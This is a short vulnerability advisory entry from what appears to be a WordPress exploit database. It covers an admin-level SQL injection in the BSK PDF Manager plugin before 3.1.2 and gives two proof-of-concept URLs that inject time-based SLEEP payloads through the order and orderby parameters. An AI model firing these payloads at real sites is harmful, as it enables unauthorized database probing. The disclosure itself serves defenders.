Lucene search

K
wpexploitJrXnmWPEX-ID:D5891973-37D0-48CB-A5A3-A26C771B3369
HistoryNov 01, 2021 - 12:00 a.m.

BSK PDF Manager < 3.1.2 - Admin+ SQL Injection

2021-11-0100:00:00
JrXnm
361
pdf manager
admin
sql injection
exploit
category
security

EPSS

0.001

Percentile

37.7%

The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue

With at least one BSK PDF Category:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date

EPSS

0.001

Percentile

37.7%

Related for WPEX-ID:D5891973-37D0-48CB-A5A3-A26C771B3369